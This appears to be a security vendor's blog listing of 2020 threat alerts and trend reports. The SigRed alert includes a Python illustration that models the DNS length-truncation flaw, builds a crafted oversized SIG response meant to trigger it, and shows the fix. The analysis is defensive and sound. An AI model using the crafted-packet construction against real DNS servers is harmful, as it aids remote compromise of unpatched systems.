Year: 2020

Microsoft Windows DNS Server Remote Code Execution Vulnerability SigRed (CVE-2020-1350) Threat Alert

August 11, 2020

Overview

On July 14, 2020 (local time), Microsoft fixed a wormable vulnerability in Windows DNS Server, dubbed SigRed (CVE-2020-1350), as part of its monthly security updates. Because exploitation requires no user interaction, an exploit could propagate from one vulnerable server to another and potentially compromise an organization's entire network.

The flaw is reported to have been present in the code for 17 years and carries a CVSS base score of 10.0 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C).

The vulnerability can be triggered when the DNS server parses an incoming query or processes the response to a query it has forwarded to another server.

Check Point researchers found that a DNS response carrying a SIG record larger than 64 KB triggers a heap-based buffer overflow in the DNS service, which an attacker can leverage to take control of the server. A response of that size cannot travel over UDP, so the oversized reply has to be delivered over TCP; a DNS server that forwards queries for attacker-controlled domains can be made to fetch it.
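As an added illustration (not code from the original alert, from NSFOCUS or from Check Point, and not the logic of dns.exe), the following Python models the length arithmetic behind the bug. It assumes only what the alert states: the size of a SIG record, once the signer's name is expanded from its compression pointer, is handled as a 16-bit quantity, so a record that exceeds 65535 bytes after expansion is under-allocated. The sample response is constructed here, and its layout (a 65535-byte message, the largest DNS over TCP allows, whose SIG signer name is a compression pointer aimed into the record's own signature bytes) is ours, chosen so that the arithmetic wraps; whether a particular parser accepts such a pointer is an assumption, not something the alert states.

```python
"""Model of the SigRed (CVE-2020-1350) length truncation.

Added illustration, not NSFOCUS, Check Point or dns.exe code. The RDATA
layout is standard SIG (RFC 2535): 18 fixed bytes, the signer's name, then
the signature. The 16-bit wrap is modelled with a mask; the sample message
below is constructed for this example.
"""
import struct

TYPE_SIG = 24
SIG_FIXED_LEN = 18      # type covered, algorithm, labels, orig TTL, expiration, inception, key tag
WORD_MAX = 0xFFFF


def encode_name(name: str) -> bytes:
    """Uncompressed wire form: length-prefixed labels, terminated by a zero byte."""
    return b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"


def expand_name(msg: bytes, offset: int) -> tuple[bytes, int]:
    """Follow RFC 1035 compression pointers; return (expanded name, offset just
    past the name as it is stored in the record). Pointer loops are rejected."""
    out, end, seen = bytearray(), None, set()
    while True:
        if offset in seen:
            raise ValueError("compression pointer loop")
        seen.add(offset)
        length = msg[offset]
        if length & 0xC0 == 0xC0:                       # two-byte pointer
            end = end if end is not None else offset + 2
            offset = struct.unpack(">H", msg[offset:offset + 2])[0] & 0x3FFF
            continue
        out += msg[offset:offset + 1 + length]
        offset += 1 + length
        if length == 0:
            return bytes(out), end if end is not None else offset


def expanded_sig_len(msg: bytes, rdata_off: int, rdlength: int) -> int:
    """Bytes the SIG RDATA occupies once the signer's name is expanded in place."""
    name, after_name = expand_name(msg, rdata_off + SIG_FIXED_LEN)
    signature_len = rdata_off + rdlength - after_name
    return SIG_FIXED_LEN + len(name) + signature_len


def vulnerable_alloc(needed: int) -> int:
    """Flawed form (model): the size reaches the allocator as a 16-bit value."""
    return needed & WORD_MAX


def fixed_alloc(needed: int) -> int:
    """Hardened form: refuse any record the 16-bit size cannot represent."""
    if needed > WORD_MAX:
        raise ValueError(f"SIG record too large after expansion: {needed} bytes")
    return needed


def is_rejected(needed: int) -> bool:
    """True when the hardened check refuses the record."""
    try:
        fixed_alloc(needed)
    except ValueError:
        return True
    return False


def build_sample_response() -> bytes:
    """Constructed 65535-byte response (the TCP maximum): empty question name and
    one SIG answer whose signer name is a pointer into the first 255 bytes of its
    own signature, so expansion adds 253 bytes the message never carried."""
    header = struct.pack(">HHHHHH", 0x1234, 0x8180, 1, 1, 0, 0)
    question = b"\x00" + struct.pack(">HH", TYPE_SIG, 1)
    rr_head_len = 2 + 10                             # owner-name pointer + type/class/ttl/rdlength
    rdata_off = len(header) + len(question) + rr_head_len
    sig_len = WORD_MAX - rdata_off - SIG_FIXED_LEN - 2
    long_name = encode_name(".".join(["a" * 63] * 3 + ["a" * 61]))   # 255 bytes, the maximum
    signature = long_name + b"\x41" * (sig_len - len(long_name))
    fixed = struct.pack(">HBBIIIH", 1, 5, 4, 3600, 0, 0, 0)
    signer = struct.pack(">H", 0xC000 | (rdata_off + SIG_FIXED_LEN + 2))   # points at long_name
    rdata = fixed + signer + signature
    answer = struct.pack(">H", 0xC00C) + struct.pack(">HHIH", TYPE_SIG, 1, 3600, len(rdata)) + rdata
    return header + question + answer


def analyze(msg: bytes) -> dict:
    """Walk the answer section and report the sizes of the first SIG record."""
    qdcount, ancount = struct.unpack(">HH", msg[4:8])
    off = 12
    for _ in range(qdcount):
        _, off = expand_name(msg, off)
        off += 4                                     # qtype + qclass
    for _ in range(ancount):
        _, off = expand_name(msg, off)
        rtype, _, _, rdlength = struct.unpack(">HHIH", msg[off:off + 10])
        off += 10
        if rtype == TYPE_SIG:
            needed = expanded_sig_len(msg, off, rdlength)
            allocated = vulnerable_alloc(needed)
            return {"rdlength": rdlength, "expanded": needed,
                    "allocated": allocated, "overflow": needed - allocated}
        off += rdlength
    return {}


if __name__ == "__main__":
    print(analyze(build_sample_response()))
```

On the constructed message, `analyze()` reports an RDLENGTH of 65506 (well-formed, and the whole message fits the 65535-byte TCP limit) but an expanded size of 65759, which the 16-bit model shrinks to 223 bytes, so a copy of the expanded record overruns its buffer by 65536 bytes. `fixed_alloc()` rejects the same record before anything is allocated: the fix is to validate the expanded size in its full width, not to mask it.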


Botnet Trend Report -5

August 10, 2020

Spear Phishing and Malicious Documents

In the past few years, malicious email attachments have become one of the most common methods that APT groups and various cybercriminal groups use to launch spear phishing attacks. Compared with previous years, 2019 saw more spear phishing attacks with a greater impact, which can be attributed to the following factors.


FBI Warning: New DDoS Reflection Attacks Are Coming, Are You Ready?

August 7, 2020

According to ZDNet, the FBI released a warning last week that criminals are abusing several network protocols to launch large-scale DDoS reflection attacks. Three protocols and one web application were identified as attack vectors: CoAP, WS-DD (WS-Discovery), ARMS (Apple Remote Management Service), and web-based Jenkins servers.


WebLogic Remote Code Execution Vulnerabilities (CVE-2020-14625, CVE-2020-14644, CVE-2020-14645, CVE-2020-14687) Threat Alert

August 7, 2020

Overview

On July 15, 2020 (Beijing time), Oracle released its Critical Patch Update (CPU) for July 2020, which fixes 443 vulnerabilities of varying severity.

The WebLogic Server Core component is affected by four severe vulnerabilities with a CVSS base score of 9.8, assigned CVE-2020-14625, CVE-2020-14644, CVE-2020-14645, and CVE-2020-14687 respectively.

All four are reachable over the T3 and IIOP protocols and allow an unauthenticated attacker with network access to execute arbitrary code remotely.

T3 and IIOP are the protocols WebLogic uses to exchange data with other Java programs. A default WebLogic installation enables the administration console, which in turn enables the T3 protocol; IIOP, which exposes remote objects as Java interfaces, is also enabled by default. Deployments that do not need these protocols should disable them or restrict access to them at the network layer, in addition to applying the patch.


2019 Cybersecurity Insights -14

August 5, 2020

Malware Threats from Mobile Platforms

Smartphones are now ubiquitous. Android, the most widely used mobile operating system, is exposed to a growing number of malware families owing to its openness and its permission model. Such malware can even be distributed through legitimate channels, including Google Play.


Multiple Cisco Vulnerabilities Threat Alert 2020

August 4, 2020

Overview

On July 15, 2020 (local time), Cisco released security advisories addressing vulnerabilities across multiple products, including five Critical vulnerabilities with a CVSS base score of 9.8 (CVE-2020-3330, CVE-2020-3323, CVE-2020-3144, CVE-2020-3331, and CVE-2020-3140).

Reference link:

https://tools.cisco.com/security/center/publicationListing.x

Botnet Trend Report -4

August 3, 2020

In the reconnaissance phase, an attacker selects targets through mass scanning, which typically looks for weak usernames and passwords that grant access to devices, and for vulnerabilities in those devices. The attacker may also try to compromise targets by sending malicious lures to email addresses harvested earlier.


Oracle July 2020 Critical Patch Update for All Product Families Threat Alert

July 31, 2020

Overview

On July 14, 2020 (local time), Oracle released its July 2020 Critical Patch Update (CPU), together with its own security advisories and third-party security bulletins, fixing 443 vulnerabilities of varying severity. For details of the affected products and available patches, see the appendix.


IP Reputation Report-07262020

July 30, 2020

1. Top 10 countries by attack count:

The diagram above shows the 10 regions with the most malicious IP addresses in the NSFOCUS IP Reputation database as of July 26, 2020.


2019 Cybersecurity Insights -13

July 29, 2020

Cryptojacking Malware

In 2019, the recovery in cryptocurrency prices led to an increase in the number of cryptojacking malware families, among which Monero-mining trojans remained dominant. EternalBlue and weak-password cracking were the main methods these malware families used to compromise large enterprises in the financial and telecom sectors and to spread within them. At the same time, to evade detection devices, cryptojacking families have been continuously upgraded, producing variants with better stealth and a modular design.

